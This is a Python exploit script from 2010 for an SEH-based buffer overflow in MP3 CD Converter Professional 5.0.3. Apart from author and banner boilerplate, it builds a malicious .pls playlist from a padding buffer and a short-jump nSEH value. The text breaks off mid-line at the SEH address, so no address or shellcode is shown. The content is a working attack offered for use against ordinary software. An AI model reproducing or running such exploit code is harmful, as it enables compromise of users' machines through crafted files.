#!/usr/bin/python # # #Python File Created BY C4SS!0 G0MES #http://www.invasao.com.br #Louredo_@hotmail.com # # #[+]Exploit Titule: Exploit Buffer Overflow MP3 CD Converter Professional(SEH) #[+]Date: 12/20/2010 #[+]Author: C4SS!0 G0M3S #[+]Software Link: http://www.mp3-cd-converter.com/mp3cdconverter.exe #[+]Version: 5.0.3 #[+]Tested On: WIN-XP SP3 Virtual Box #[+]CVE: N/A # # # import os import sys import struct import time def usage(): os.system("cls") os.system("color 4f") print("\n" "=====================================================================\n" "|| ||\n" "|| Exploit Buffer Overflow MP3 CD Converter Professional(SEH) ||\n" "|| Author C4SS!0 G0M3S ||\n||" " ||\n" "=====================================================================\n\n") print("[+]Exploit: Exploit Buffer Overflow MP3 CD Converter Professional(SEH)") print("[+]Date: 12/20/2010") print("[+]Author: C4SS!0 G0M3S") print("[+]E-mail: Louredo_@hotmail.com") print("[+]Home: http://www.invasao.com.br") print("[+]Impact: Hich") print("[+]Version: 5.0.3") print("[+]Country: Brazil\n") if len(sys.argv) !=2: usage() print "[-]Usage: "+sys.argv[0]+" " print "[-]Exemple: "+sys.argv[0]+" Exploit.pls" sys.exit(0) buffer = "\x41" * 780 nseh = "\xeb\x0d\x90\x90" #JMP SHORT 14 seh = struct.pack('